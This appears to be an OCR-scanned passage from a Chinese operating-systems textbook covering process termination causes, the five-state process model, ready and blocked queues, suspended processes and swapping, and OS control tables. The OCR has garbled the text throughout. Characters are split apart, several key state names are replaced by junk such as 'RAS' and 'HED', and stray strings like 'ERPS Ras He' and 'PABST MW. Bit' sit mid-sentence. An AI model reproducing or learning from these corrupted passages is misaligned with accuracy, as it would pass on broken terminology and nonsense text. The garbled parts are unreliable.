算术 错误 进程 试图 进行 被 禁止 的 计算 ， 如 除 以 零 或 者 存储 大 于 硬件 可 以 接纳 的 数字 
时 间 超 出 进程 等 待 某 一 事件 发 生 的 时 间 超 过 了 规定 的 最 大 值 
在 输入 或 输出 期 间 发 生 错 误 ， 如 找 不 到 文件 、 在 超过 规定 的 最 多 努力 次 数 后 仍 
1/0 失败 然 读 / 写 失 败 ( 例如 当 遇 到 了 磁带 上 的 一 个 坏 区 时 ) 或 者 无 效 操作 ( 如 从 行 式 打印 
机 中 读 ) 
无 效 指令 进程 试图 执行 一 个 不 存在 的 指令 (通常 是 由 于 转移 到 了 数据 区 并 企图 执行 数据 ) 
特权 指令 进程 试图 使 用 为 操作 系统 保留 的 指令 
数据 误 用 错误 类 型 或 未 初始 化 的 一 块 数据 
操作 员 或 操作 系统 干涉 由 于 某 些 原因 ， 操 作 员 或 操作 系统 终止 进程 (例如 ， 如 果 存 在 死 锁 ) 
父 进程 终止 当 一 个 父 进程 终止 时 ， 操 作 系 统 可 能 会 自动 终止 该 进程 的 所 有 后 代 进 程 
父 进程 请 求 父 进程 通常 具有 终止 其 任何 后 代 进 程 的 权力 


3.2.3 五 状态 模型 


如 果 所 有 进程 都 做 好 了 执行 准备 ， 则 图 3.5b 所 给 出 的 排队 原则 是 有 效 的 。 队 列 是 “先进 先 
出 ”( first-in-first-out ) 的 表 ， 对 于 可 运行 的 进程 处 理 器 以 一 种 轮转 (round-robin) 方式 操作 ( HK 
次 给 队列 中 的 每 个 进程 一 定 的 执行 时 间 ， 然 后 进程 返回 队列 ， 阻 塞 情 况 除外 )。 但 是 ， 即 使 对 前 
面 描述 的 简单 例子 , 这 个 实现 都 是 不 合适 的 : 存在 着 一 些 处 于 非 运行 状态 但 已 经 就 绪 等 待 执行 的 
进程 , 而 同时 存在 另外 的 一 些 处 于 阻塞 状态 等 待 IO 操作 结束 的 进程 。 因此, 如 果 使 用 单个 队列 ， 


O 在 某 些 情况 下 ， 一 个 宽松 的 操作 系统 可 能 会 允许 用 户 从 错误 中 恢复 而 不 结束 进程 。 例 如 ， 如 果 用 户 请 求 访问 
文件 失败 ， 操 作 系 统 可 能 仅仅 告知 访问 被 拒绝 并 且 人 允许 进程 继续 运行 。 
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分 派 器 不 能 只 考虑 选择 队列 中 最 老 的 进程 , 相反 , 它 应 该 扫描 这 个 列表 ， ERPS Ras He 
队列 中 时 间 最 长 的 进程 。 

解决 这 种 情况 的 一 种 比较 自然 的 方法 是 将 非 运行 状态 分 成 两 个 状态 : 就 绪 ( ready ) 和 阻塞 
(blocked )， 如 图 3.6 所 示 。 此 外 还 应 该 另外 增加 两 个 已 经 证 明 很 有 用 的 状态 。 新 图 中 的 5 个 状态 如 下 : 





3.6 五 状态 进程 模型 


o 运行 态 : 该 进程 正在 执行 。 在 本 章 中 ， 假 设计 算 机 只 有 一 个 处 理 器 ， 因 此 一 次 最 多 只 有 
一 个 进程 处 于 这 个 状态 。 | 
o RAS: 进程 做 好 了 准备 ， 只 要 有 机 会 就 开始 执行 。 
o 阻塞 /等 待 态 e ， 进程 在 某 些 事件 发 生前 不 能 执行 ， 如 1/O 操作 完成 。 
o HED: 刚刚 创 建 的 进程 ， 操 作 系统 还 没有 把 它 加 入 到 可 执行 进程 组 中 。 通 常 是 进程 控 
制 块 已 经 创建 但 还 没有 加 载 到 内 存 中 的 新 进程。 
e 退出 态 : 操作 系统 从 可 执行 进程 组 中 释放 出 的 进程 ， 或 者 是 因为 它 自身 停止 了 ， 或 者 是 
因为 某 种 原因 被 取消 。 
新 建 态 和 退出 态 对 进程 管理 是 非常 有 用 的 。 新 建 状态 对 应 于 刚刚 定义 的 进程 。 例 如 ,如 果 一 
位 新 用 户 试图 登录 到 分 时 系统 中 , 或 者 一 个 新 的 批 作业 被 提交 执行 , 那么 操作 系统 可 以 分 两 步 定 
义 新 进程 。 首 先 ， 操 作 系统 执行 一 些 必需 的 辅助 工作 ,将 标识 符 关 联 到 进程 ， 分配 和 创建 管理 进 
程 所 需要 的 所 有 表 。 此 时 ,进程 处 于 新 建 状 态 ， 这 意味 着 操作 系统 已 经 执行 了 创建 进程 的 必需 动 
E, 但 还 没有 执行 进程 。 例 如 ， 操 作 系统 可 能 基于 性 能 或 内 存 局 限 性 的 原因 ， 限 制 系统 中 的 进程 
数量 。 当 进程 处 于 新 建 态 时 ,操作 系统 所 需要 的 关于 该 进程 的 信息 保存 在 内 存 中 的 进程 表 中 , 但 
进程 自身 还 未 进入 内 存 , 就 是 即将 执行 的 程序 代码 不 在 内 存 中 ,也 没有 为 与 这 个 程序 相关 的 数据 
分 配 空间 。 当 进程 处 于 新 建 态 时 ， 程 序 保留 在 外 存 中 ， 道 常 是 磁盘 中 。 。 
类 似 地 ， 进程 退出 系统 也 分 为 两 步 。 首 先 ， 当 进程 到 达 一 个 自然 结束 点 时 ,由 于 出 现 不 可 恢 
复 的 错误 而 取消 时 ,或 当 具 有 相应 权限 的 另 一 个 进程 取消 该 进程 时 ,进程 被 终止 ; 终止 使 进程 转 
换 到 退出 态 ， 此 时 ， 进 程 不 再 被 执行 了 ， 与 作业 相关 的 表 和 其 他 信息 临时 被 操作 系统 保留 起 来 ， 
这 给 辅助 程序 或 支持 程序 提供 了 提取 所 需 信息 的 时 间 。 一 个 实用 程序 为 了 分 析 性 能 和 利用 率 ， 
可 能 需要 提取 进程 的 历史 信息 ， 一旦 这 些 程序 都 提取 了 所 需要 的 信息 ,操作 系统 就 不 再 需要 保留 
任何 与 该 进程 相关 的 数据 ， 该 进程 将 从 系统 中 删除 。 
图 3.6 显示 了 导致 进程 状态 转换 的 事件 类 型 。 可 能 的 转换 如 下 
o 空 一 新 建 ! 创建 执行 一 个 程序 的 新 进程 。 这 个 事件 在 表 3.1 中 所 列 出 的 原因 下 都 会 发 生 。 
o 新 建 一 就 绪 : 操作 系统 准备 好 再 接纳 一 个 进程 时 ， 把 一 个 进程 从 新 建 态 转换 到 就 绪 态 


O “等 待 态 ” 作 为 一 个 进程 状态 ， 经 常用 于 替换 术语 “阻塞 态 "。 一 般 情况 下 ， 我 们 常用 “ 阻 赛 态 "， 但 是 这 两 个 
术语 是 可 以 互 换 的 。 

© 在 这 一 段 的 讨论 中 ， 急 略 了 上 岩 拟 内 存 的 概念 。 在 支持 嘎 拟 内 存 的 系统 中 ， 当 进程 从 新 建 态 转换 到 就 绪 态 时 ， 
它 的 程序 代码 和 数据 被 加 载 到 虚拟 内 存 中 。 虚 拟 内 存 的 简单 介绍 见 第 2 章 ， 详 细 内 容 请 参阅 第 8 章 。 
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大 多 数 系 统 基 于 现 有 的 进程 数 或 分 配给 现 有 进程 的 虚拟 内 存 数 量 设置 一 些 限制 ， 以 确保 

不 会 因为 活路 进程 的 数量 过 多 而 导致 系统 的 性 能 下 降 。 

就 绪 一 运行 : 需要 选择 一 个 新 进程 运行 时 ， 操 作 系 统 选 择 一 个 处 于 就 绪 态 的 进程 ， 这 是 

调度 器 或 分 派 器 的 工作 。 进 程 的 选择 问题 将 在 第 四 部 分 探讨 。 

eh 如 果 当 前 正在 运行 的 进程 表示 自己 已 经 完成 或 取消 ， 则 它 将 被 操作 系统 终 
见 表 3.2。 

扣 沫 就绪， 这 类 转换 最 常见 的 原因 是 ， 正 在 运行 的 法 程 到 达 了 “多 许 不 中 断 执 行 ”的 

最 大 时 间 段 ; 实际 上 所 有 多 道 程 序 操作 系统 都 实行 了 这 类 时 间 限 定 。 这 类 转换 还 有 很 多 

其 他 原因 ， 例 如 操作 系统 给 不 同 的 进程 分 配 不 同 的 优先 级 ,但 这 不 是 在 所 有 的 操作 系统 

PABST MW. Bit, 进程 A 在 一 个 给 定 的 优先 级 运行 ， 且 具有 更 高 优先 级 的 进程 B 正 

处 于 阻塞 态 。 如 果 操 作 系 统 知 道 进 程 B 等 待 的 事件 已 经 发 生 了 ， 则 将 B 转换 到 就 绪 态 ， 

然后 因为 优先 级 的 原因 中 断 进 程 A 的 执行 ， 将 处 理 器 分 派 给 进程 B， 我 们 说 操作 系统 抢 

占 了 进程 AS 。 最 后 一 种 情况 是 ， 进 程 自 愿 释放 对 处 理 器 的 控制 ， 例 如 一 个 周期 性 地 进 

行 记 账 和 维护 的 后 台 进 程 。 

运行 一 阻塞 : 如 果 进 程 请 求 它 必须 等 待 的 某 些 事件 ， 则 进入 阻塞 态 。 对 操作 系统 的 请 求 

通常 以 系统 服务 调用 的 形式 发 出 ， 也 就 是 说 ， 正 在 运行 的 程序 请 求 调用 操作 系统 中 一 部 

分 代码 所 发 生 的 过 程 。 例 如 ， 进 程 可 能 请 求 操作 系统 的 一 个 服务 ,但 操作 系统 无 法 立即 

予以 服务 , 它 也 可 能 请 求 了 一 个 无 法 立即 得 到 的 资源 , 如 文件 或 虚拟 内 存 中 的 共享 区 域 ; 

或 者 也 可 能 需要 进行 某 种 初始 化 的 工作 ， 如 VO 操作 所 遇 到 的 情况 ， 并 且 只 有 在 该 初始 

化 动作 完成 后 才能 继续 执行 。 当 进程 互相 通信 ， 一 个 进程 等 待 男 一 个 进程 提供 输入 时 ， 

或 者 等 待 来 自 另 一 个 进程 的 信息 时 ， 都 可 能 被 阻塞 。 

阻塞 一 就 绪 : 当 所 等 待 的 事件 发 生 时 ， 处 于 阻塞 态 的 进程 转换 到 就 绪 态 。 

就 绪 一 退出 : 为 了 清楚 起 见 ， 状 态 图 中 没有 表示 这 种 转换 。 在 某 些 系统 中 ， 父 进程 可 以 

在 任何 时 刻 终止 一 个 子 进程 。 如 果 一 个 父 进程 终止 ， 与 该 父 进程 相关 的 所 有 子 进程 都 将 

被 终止 。 

阻塞 一 退出 : 前 面 一 项 提供 了 注释 。 


再 回 到 前 面 的 简单 例子 , 图 3.7 显示 了 每 个 进程 在 状态 间 的 转换 , 图 3.8a 给 出 了 可 能 实现 的 
排队 规则 ， 有 两 个 队列 : 就 绪 队 列 和 阻塞 队列 。 进 入 系统 的 每 个 进程 被 放置 在 就 绪 队 列 中 ， 当 操 
作 系 统 选择 另 一 个 进程 运行 时 ,将 从 就 绪 队 法 和 A 一 一 


列 中 选择 。 对 于 没有 优先 级 的 方案 ， 这 可 以 
是 一 个 简单 的 先进 先 出 队列 。 当 一 个 正在 运 

















行 的 进程 被 移出 处 理 器 时 , 它 根据 情况 或 者 ama La a OC 


被 终止 ， 或 者 被 放置 在 就 绪 或 阻塞 队列 中 。 
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最 后 ， 当 一 个 事件 发 生 时 ， 所 有 位 于 阻塞 队 


列 中 等 待 这 个 事件 的 进程 都 被 转换 到 就 绪 
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队列 中 。 图 3.7 图 3.4 中 的 进程 状态 

后 一 种 方案 意味 着 当 一 个 事件 发 生 时 ， 

操作 系统 必须 扫描 整个 阻塞 队列 , 搜索 那些 等 待 该 事件 的 进程 。 在 大 型 操作 系统 中 , 队列 中 可 能 
有 几 百 甚至 几 千 个 进程 ， 因 此 ， 拥 有 多 个 队列 将 会 很 有 效 ， 一 个 事件 可 以 对 应 一 个 队列 。 那 么 ， 


© 


一 般 来 说 ,抢占 这 个 术语 被 定义 为 收回 一 个 进程 正在 使 用 的 资源 。 在 这 种 情况 下 ， 资源 就 是 处 理 器 本 身 。 进 
程 正在 执行 并 且 可 以 继续 执行 ， 但 是 由 于 其 他 进程 需要 执行 而 被 抢占 。 
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当 事 件 发 生 时 ， 相 应 队列 中 的 所 有 进程 都 转换 到 就 绪 态 ( 见 图 3.80 )。 
















事件 1 等 待 

















事件 2 等待 
事件 等 竺 
b) 多 条 阻塞 队列 


图 3.8 图 3.6 的 排队 模型 


最 后 还 有 一 种 改进 是 ,如 果 按 照 优 先 级 方案 分 派 进程 ,维护 多 个 就 绪 队 列 ( 每 个 优先 级 一 个 
队列 ) 将 会 带 来 很 多 的 便利 。 操作 系统 可 以 很 容易 地 确定 娜 个 就 绪 进 程 具有 最 高 的 优先 级 且 等 待 
时 间 最 长 。 


3.2.4 被 挂 起 的 进程 


交换 的 需要 

前 面 描述 的 三 个 基本 状态 (就绪 态 、 运 行 态 和 阻塞 态 ) 提供 了 一 种 为 进程 行为 建立 模型 的 系 
统 方法 ， 并 指导 操作 系统 的 实现 。 许 多 实际 的 操作 系统 都 是 按照 这 样 的 三 种 状态 进行 具体 构造 的 。 

BÆ, 可 以 证 明 往 模 型 中 增加 其 他 状态 也 是 合理 的 。 为 了 说 明 加 入 新 状态 的 好 处 ,考虑 一 个 
没有 使 用 虚拟 内 存 的 系统 ， 每 个 被 执行 的 进程 必须 完全 载 和 内存， 因此 ， 图 3.8b 中 ， 所 有 队列 
中 的 所 有 进程 必须 驻 留 在 内 存 中 。 

所 有 这 些 设计 机 制 的 原因 都 是 由 于 IO 活动 比 计算 速 度 慢 很 多 , 因此 在 单 道 程序 系统 中 的 处 
理 器 在 大 多 数 时 候 是 空闲 的 。 但 是 图 3.8b 的 方案 并 没有 完全 解决 这 个 问题 。 在 这 种 情况 下 ， 内 
存 保存 有 多 个 进程 ， 当 一 个 进程 正在 等 待 时 ， 处 理 器 可 以 转移 到 另 一 个 进程 ， 但 是 处 理 器 比 IO 
要 快 得 多 ， 以 至 于 内 存 中 所 有 的 进程 都 在 等 待 VO 的 情况 很 常见 。 因 此 ， 即 使 是 多 道 程序 设计 ， 
大 多 数 时候 处 理 器 仍然 可 能 处 于 空闲 状态 。 

一 种 解决 方法 是 内 存 可 以 被 扩充 以 适应 更 多 的 进程 ， 但 是 这 种 方法 有 两 个 缺陷 。 首 先是 内 存 的 
价格 问题 ， 当 内 存 大 小 增加 到 兆 位 及 千 兆 位 时 ,价格 也 会 随 之 增加 ; 再 者 ， 程 序 对 内 存 空间 需求 的 
增长 速度 比 内 存 价格 下 降 的 速度 快 。 因 此 ， 玩 大 的 内 存 往往 导致 更 大 的 进程 ， 而 不 是 更 多 的 进程 。 

另 一 种 解决 方案 是 交换 , 包括 把 内 存 中 某 个 进程 的 一 部 分 或 全 部 移 到 磁盘 中 。 当 内 存 中 没有 
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处 于 就 缮 状态 的 进程 时 ， 操 作 系 统 就 把 被 阻塞 的 进程 换 出 到 磁盘 中 的 “ 挂 起 队列 ”( suspend 
queue )， 这 是 暂时 保存 从 内 存 中 被 “驱逐 ”出 的 进程 队列 , 或 者 说 是 被 挂 起 的 进程 队列 。 操 作 系 
统 在 此 之 后 取出 挂 起 队列 中 的 另 一 个 进程 ， 或 者 接受 一 个 新 进程 的 请 求 ， 将 其 纳入 内 存 运行 。 

“交换 ”( swapping ) 是 一 个 IO 操作 ， 因 而 也 可 能 使 间 题 更 加 恶化 。 但 是 由 于 磁盘 IO 一 般 
ERB PRR VO ( 相对 于 磁带 或 打印 机 WO )， 所 以 交换 通常 会 提高 性 能 。 

为 使 用 前 面 描述 的 交换 ,在 我 们 的 进程 行为 模型 ( 见 图 3.9a ) 中 必须 增加 另 一 个 状态 : 挂 起 
态 。 当 内 存 中 的 所 有 进程 都 处 于 阻塞 态 时 , 操作 系统 可 以 把 其 中 的 一 个 进程 置 于 挂 起 态 , 并 将 它 
转移 到 磁盘 ， 内 存 中 释放 的 空间 可 被 调 入 的 另 一 个 进程 使 用 。 

当 操 作 系 统 已 经 执行 了 一 个 换 出 操作 , 它 可 以 有 两 种 将 一 个 进程 取 到 内 存 中 的 选择 : 可 以 接 
纳 一 个 新 近 创 建 的 进程 , 或 调和 一 个 以 前 被 挂 起 的 进程 。 显 然 , 通常 比较 倾向 于 调 人 一 个 以 前 被 
挂 起 的 进程 ， 给 它 提供 服务 ， 而 不 是 增加 系统 中 的 负载 总 数 。 

但 是 ， 这 个 推理 也 带 来 了 一 个 难题 ， 所 有 已 经 挂 起 的 进程 在 挂 起 时 都 处 于 阻塞 态 。 显 然 ， 这 时 
把 被 阻塞 的 进程 取 回 内 存 没 有 任何 意义 ， 因 为 它 仍然 没有 准备 好 执行 。 但 是 ， 考 虑 到 挂 起 状态 中 的 
每 个 进程 最 初 是 阻塞 在 一 个 特定 的 事件 上 ， 当 这 个 事件 发 生 时 ， 进 程 就 不 再 阻塞 ， 可 以 继续 执行 。 

因此 ， 我 们 需要 重新 考虑 设计 方式 。 这 里 有 两 个 独立 的 概念 : 进程 是 否 在 等 待 一 个 事件 
(阻塞 与 否 ) 以 及 进程 是 否 已 经 被 换 出 内 存 ( 挂 起 与 否 )。 为 适应 这 种 2x 2 的 组 合 ， 需 要 4 个 
RS: 

@ 就 绪 态 : 进程 在 内 存 中 并 可 以 执行 。 

@ 阻塞 态 : 进程 在 内 存 中 并 等 待 一 个 事件 。 

@ 阻塞 / 挂 起 态 : 进程 在 外 存 中 并 等 待 一 个 事件 。 

@ 就 绪 / 挂 起 态 : 进程 在 外 存 中 ， 但 是 只 要 被 载 人 内 存 就 可 以 执行 。 


分 派 





D 有 两 个 挂 起 态 
图 3.9 ”有 挂 起 态 的 进程 状态 转换 图 ， 
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在 查看 包含 两 个 新 挂 起 状态 的 状态 转换 图 之 前 , 必须 提 到 另 一 点 。 到 现在 为 止 的 论述 都 假设 
没有 使 用 虚拟 内 存 ， 进 程 或 者 都 在 内 存 中 , 或 者 都 在 内 存 之 外 。 在 虚拟 内 存 方案 中 ,可 能 会 执行 
到 只 有 一 部 分 内 容 在 内 存 中 的 进程 , 如 果 访 问 的 进程 地 址 不 在 内 存 中 , 则 进程 的 相应 部 分 可 以 被 
调 人 内 存 。 虚拟 内 存 的 使 用 看 上 去 会 消除 显 式 交换 的 需要 , 这 是 因为 通过 处 理 器 中 的 存储 管理 硬 
件 , 任何 期 望 的 进程 中 的 任何 期 望 的 地 址 都 可 以 移 人 或 移出 内 存 。 但 是 ,正如 在 第 8 章 中 将 会 看 
到 的 , 如 果 有 足够 多 的 活动 进程 , 并 且 所 有 进程 都 有 一 部 分 在 内 存 中 , 则 有 可 能 导致 虚拟 内 存 系 
统 甬 省 。 因 此 ， 即 使 在 虚拟 存储 系统 中 ,操作 系统 也 需要 不 时 地 根据 执行 情况 显 式 地 、 完 全 地 换 
出 进程 。 
现在 来 看 图 3.9b 中 我 们 已 开发 的 状态 转换 模型 ( 图 中 的 虚线 表示 可 能 但 并 不 是 必需 的 转换 )。 
比较 重要 的 新 的 转换 如 下 : 
@ 阻塞 一 阻塞 / 挂 起 :， 如 果 没 有 就 绪 进程 ， 则 至 少 一 个 阻塞 进程 被 换 出 ， 为 另 一 个 没有 阻塞 
的 进程 让 出 空间 。 如 果 操 作 系统 确定 当前 正在 运行 的 进程 ， 或 就 绪 进 程 为 了 维护 基本 的 
性 能 要 求 而 需要 更 多 的 内 存 空 间 , 那么 , 即使 有 可 用 的 就 绪 态 进程 也 可 能 出 现 这 种 转换 。 
© 阻塞 / 挂 起 一 就 绪 / 挂 起 : 如果 等 待 的 事件 发 生 了 ， 则 处 于 阻塞 / 挂 起 状态 的 进程 可 以 转换 
到 就 绪 / 挂 起 状态 。 注 意 ， 这 要 求 操作 系统 必须 能 够 得 到 挂 起 进程 的 状态 信息 。 
o 就 绪 / 挂 起 一 就 结 : 如 果 内 存 中 没有 就 绪 态 进程 ， 操 作 系统 需要 调 人 一 个 进程 继续 执行 。 
此 外 ， 当 处 于 就 绪 / 挂 起 态 的 进程 比 处 于 就 绪 态 的 任何 进程 的 优先 级 都 要 高 时 ,也 可 以 进 
行 这 种 转换 。 这 种 情况 的 产生 是 由 于 操作 系统 设计 者 规定 调 人 高 优先 级 的 进程 比 减少 交 
换 量 更 重要 。 
o 就 绪 一 就 绪 / 挂 起 : 通常 ， 操 作 系统 更 倾向 于 挂 起 阻塞 态 进程 而 不 是 就 绪 态 进程 ， 因 为 就 
绪 态 进程 可 以 立即 执行 ， 而 阻塞 态 进 程 占用 了 内 存 空间 但 不 能 执行 。 但 如 果 释 放 内 存 以 
得 到 足够 空间 的 唯一 方法 是 挂 起 一 个 就 绪 态 进程 ， 那 么 这 种 转换 也 是 必需 的 。 并 且 ， 如 
果 操 作 系 统 确信 高 优先 级 的 阻塞 态 进 程 很 快 将 会 就 绪 ， 那 么 它 可 能 选择 挂 起 一 个 低 优先 
级 的 就 绪 态 进程 ， 而 不 是 一 个 高 优先 级 的 阻塞 态 进 程 。 
还 需要 考虑 的 几 种 其 他 转换 有 : 
@ 新 建 一 就 绪 / 挂 起 以 及 新 建 一 就 绪 : 当 创建 一 个 新 进程 时 ， 该 进程 或 者 加 入 到 就 绪 队 列 ， 
或 者 加 入 到 就 绪 / 挂 起 队列 中 。 不 论 哪 种 情况 ， 操 作 系 统 都 必须 建立 一 些 表 以 管理 进程 ， 
并 为 进程 分 配 地 址 空间 。 操 作 系 统 可 能 更 倾向 于 在 初期 执行 这 些 辅助 工作 ， 这 使 得 它 可 
以 维护 大 量 的 未 阻塞 的 进程 。 通 过 这 个 策略 ， 内 存 中 经 常会 没有 足够 的 空间 分 配给 新 进 
程 ， 因 此 使 用 了 ( 新建 一 就 绪 / 挂 起 ) 转换 。 另 一 方面 ， 我 们 可 以 证 明 创建 进程 的 适时 
(just-in-time ) 原理 ， 即 尽 可 能 推迟 创建 进程 以 减少 操作 系统 的 开销 ， 并 在 系统 被 阻塞 态 
进程 阻塞 时 允许 操作 系统 执行 进程 创建 任务 。 
o 阻塞 / 挂 起 一 阻塞 : 这 种 转换 在 设计 中 比较 少见 ， 如 果 一 个 进程 没有 准备 好 执行 ， 并 且 不 
在 内 存 中 ， 调 人 它 又 有 什么 意义 ? 但 是 考虑 到 下 面 的 情况 : 一 个 进程 终止 ， 释 放 了 一 些 
内 存 空 间 ， 阻 塞 / 挂 起 队列 中 有 一 个 进程 比 就 绪 / 挂 起 队列 中 的 任何 进程 的 优先 级 都 要 高 ， 
并 且 操 作 系统 有 理由 相信 阻塞 进程 的 事件 很 快 就 会 发 生 ， 这 时 ， 把 阻塞 进程 而 不 是 就 绪 
进程 调 人 内 存 是 合理 的 。 
© 运行 一 就 绪 / 挂 起 ; 通常 当 分 配给 一 个 运行 进程 的 时 间 期 满 时 , 它 将 转换 到 就 绪 态 。 但是， 
如 果 由 于 位 于 阻塞 / 挂 起 队列 的 具有 较 高 优先 级 的 进程 变 得 不 再 被 阻塞 , 操作 系统 抢占 这 
个 进程 ， 也 可 以 直接 把 这 个 运行 进程 转换 到 就 绪 / 挂 起 队 形 中 ， 并 释放 一 些 内 存 空 间 。 
© 各 种 状态 一 退出 : 在 典型 情况 下 ， 一 个 进程 在 运行 时 终止 ， 或 者 是 因为 它 已 经 完成 ,或 
者 是 因为 出 现 了 一 些 错误 条 件 。 但 是 ， 在 某 些 操作 系统 中 ， 一 个 进程 可 以 被 创建 它 的 进 
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程 终止 ， 或 当 父 进程 终止 时 终止 。 如 果 人 允许 这 样 ， 则 进程 在 任何 状态 时 都 可 以 转换 到 退 
出 态 。 


挂 起 的 其 他 用 途 

到 目前 为 止 ， 挂 起 进程 的 概念 与 不 在 内 存 中 的 进程 概念 是 等 价 的 。 一 个 不 在 内 存 中 的 进程 ， 
不 论 它 是 否 在 等 待 一 个 事件 ， 都 不 能 立即 执行 。 

我 们 可 以 总 结 一 下 挂 起 进程 的 概念 。 首 先 ， 按 照 以 下 特点 定义 挂 起 进程 : 

1) 进程 不 能 立即 执行 。 

2) 进程 可 能 是 或 不 是 正在 等 待 一 个 事件 。 如 果 是 ， 阻 塞 条 件 不 依赖 于 挂 起 条 件 ， 阻 塞 事件 

的 发 生 不 会 使 进程 立即 被 执行 。 
3) 为 阻止 进程 执行 ， 可 以 通过 代理 把 这 个 进程 置 于 挂 起 状态 ， 代 理 可 以 是 进程 自己 ， 也 可 
以 是 父 进程 或 操作 系统 。 

4) 除非 代理 显 式 地 命令 系统 进行 状态 转换 ， 否则 进程 元 法 从 这 个 状态 中 转移 。 

表 3.3 列 出 了 进程 的 一 些 挂 起 原因 。 已 经 讨论 过 的 一 个 原因 是 提供 更 多 的 内 存 空间 ， 这样 可 
以 调和 一 个 就 绪 / 挂 起 态 进程 ， 或 者 增加 分 配给 其 他 就 绪 态 进程 的 内 存 。 操 作 系 统 因为 其 他 动机 
而 挂 起 一 个 进程 , 例如 , 记 账 或 跟踪 进程 可 能 用 于 监视 系统 的 活动 , 可 以 使 用 进程 记录 各 种 资源 
(处 理 器 、 内 存 、 通 道 ) 的 使 用 情况 以 及 系统 中 用 户 进程 的 进行 速度 。 在 操作 员 控 制 下 的 操作 系 
统 可 以 不 时 地 打开 或 关闭 这 个 进程 。 如 果 操 作 系统 发 现 或 怀疑 有 问题 ， 它 可 以 挂 起 进程 。 死 锁 就 
是 一 个 例子 , 将 在 第 6 章 讲 述 。 另 一 个 例子 是 ,如果 在 进程 测试 时 检测 到 通信 线路 中 的 问题 ， 操 
作 员 让 操作 系统 挂 起 使 用 该 线路 的 进程 。 

另外 一 些 原因 关系 到 交互 用 户 的 行为 。 例 如 ， 如 果 用 户 怀 疑 程序 中 有 缺陷 , 他 (她 ) 可 以 挂 
起 执行 程序 并 进行 调试 , 检查 并 修改 程序 或 数据 , 然后 恢复 执行 ; 或 者 可 能 有 一 个 收集 记录 或 记 
账 的 后 台 程 序 ， 用 户 可 能 希望 能 够 打开 或 关闭 这 个 程序 。 


表 3.3 ”导致 进程 挂 起 的 原因 


事 件 说 PA 
交换 操作 系统 需要 释放 足够 的 内 存 空间 ， 以 调 人 并 执行 处 于 就 绪 状 态 的 进程 
其 他 OS 原因 操作 系统 可 能 挂 起 后 台 进 程 或 工具 程序 进程 ， 或 者 被 怀疑 导致 问题 的 进程 
一 个 行 BHA 

交互 式 用 户 请 求 用户 可 能 希望 挂 起 个 程序 的 执行 ， 目 的 是 为 了 调试 或 者 与 一 个 资源 的 使 用 
进行 连接 

定时 一 个 进程 可 能 会 周期 性 地 执行 ( 例如 记 账 或 系统 监视 进程 )， 而且 可 能 在 等 待 
下 一 个 时 间 间 隔 时 被 挂 起 

~、 父 进程 可 能 会 希望 挂 起 后 代 进 程 的 执行 ， 以 检查 或 修改 挂 起 的 进程 ， 或 者 协 

父 进程 请 求 


调 不 同 后 代 进 程 之 间 的 行为 


时 机 的 选择 也 会 导致 一 个 交换 决策 。 例 如， 如 果 一 个 进程 周期 性 地 被 激活 , 但 大 多 数 时 间 是 
空闲 的 ， 则 在 它 在 两 次 使 用 之 间 应 该 被 换 出 。 监 视 使 用 情况 或 用 户 活 动 的 程序 就 是 一 个 例子 。 

最 后 ， 父 进程 可 能 会 希望 挂 起 一 个 后 代 进 程 。 例 如 ， 进 程 A 可 以 生成 进程 B， 以 执行 文件 
BRE; 随后， 进程 B 在 读 文 件 的 过 程 中 遇 到 错误 ， 并 报告 给 进程 A; 进程 A 挂 起 进程 B ， 调 
查 错误 的 原因 。 

在 所 有 这 些 情况 中 ， 挂 起 进程 的 活动 都 是 由 最 初 请 求 挂 起 的 代理 请 求 的 。 


3.3 ”进程 描述 
操作 系统 控制 计算 机 系统 内 部 的 事件 , 它 为 处 理 器 执行 进程 而 进行 调度 和 分 派 , 给 进程 分 配 
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资源 , 并 响应 用 户 程 序 的 基本 服务 请 求 。 因此, 我 们 可 以 把 操作 系统 看 做 是 管理 系统 资源 的 实体 。 
这 个 概念 如 图 3.10 所 示 。 在 多 道 程序 设计 环境 中 ， 在 虚拟 内 存 中 有 许多 已 经 创建 了 的 进程 
(Pl1，*…，P, )， 每 个 进程 在 执行 期 间 ， 需 要 访问 某 些 系统 资源 ， 包 括 处 理 器 、I/O 设备 和 内 存 。 在 
Et, HEP 正在 运行 ， 该 进程 至 少 有 一 部 分 在 内 存 中 ， 并 且 还 控制 着 两 个 IO 设备 ， 进程 P; 也 
在 内 存 中 ,但 由 于 正在 等 待 分 配给 Pi 的 I/O 设备 而 被 阻塞 ， 进程 P, 已 经 被 换 出 ， 因 此 是 挂 起 的 。 
以 后 几 章 中 将 探讨 操作 系统 代表 进程 管理 这 些 资源 的 细节 。 这 里 关心 的 是 一 些 最 基本 的 问 
题 : 操作 系统 为 了 控制 进程 和 管理 资源 需要 哪些 信息 ? 





图 3.10 ”进程 和 资源 ( 某 一 时 刻 的 资源 分 配 ) 


3.3.1 操作 系统 的 控制 结构 


操作 系统 为 了 管理 进程 和 资源 , 必须 掌握 关于 每 个 进程 和 资源 当前 状态 的 信息 。 普遍 使 用 的 
方法 是 : 操作 系统 构造 并 维护 它 所 管理 的 每 个 实体 的 信息 表 。 图 3.11 给 出 了 这 种 方法 的 一 般 概 
念 ， 操 作 系 统 维护 着 4 种 不 同类 型 的 表 : 内 存 、ILO、 文 件 和 进程 。 尽 管 不 同 的 操作 系统 中 的 实 
现 细节 不 同 , 但 基本 上 所 有 操作 系统 维护 的 信息 都 可 以 分 为 这 4 类 。 ‘ 





图 3.11 操作 系统 控制 表 的 通用 结构 


内 存 表 用 于 跟踪 内 (SC) 存 和 外 存 ( 虚拟 内 存 )。 内 存 的 某 些 部 分 为 操作 系统 而 保留 ， 剩 余 
部 分 是 进程 可 以 使 用 的 , 保存 在 外 存 中 的 进程 使 用 某 种 类 型 的 虚拟 内 存 或 简单 的 交换 机 制 。 内 存 
表 必 须 包 括 以 下 信息 : 

@ 分 配给 进程 的 内 存 。 

@ 分 配给 进程 的 外 存 。 
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@ 内 存 块 或 虚拟 内 存 块 的 任何 保护 属性 ， 如 哪些 进程 可 以 访问 某 些 共享 内 存 区域 。 

@ 管理 虚拟 内 存 所 需要 的 任何 信息 。 

第 三 部 分 将 详细 讲述 用 于 内 存 管理 的 信息 结构 。 

操作 系统 使 用 MO 表 管 理 计 算 机 系统 中 的 IO 设备 和 通道 。 在 任何 给 定 的 时 刻 ， 一 个 VO 设 
备 或 者 是 可 用 的 , 或 者 已 分 配给 某 个 特定 的 进程 ,如果 正 在 进行 ORE, 则 操作 系统 需要 知道 
VO 操作 的 状态 和 作为 WO 传送 的 源 和 目标 的 内 存单 元 。 在 第 11 章 将 详细 讲述 IO 管理 。 

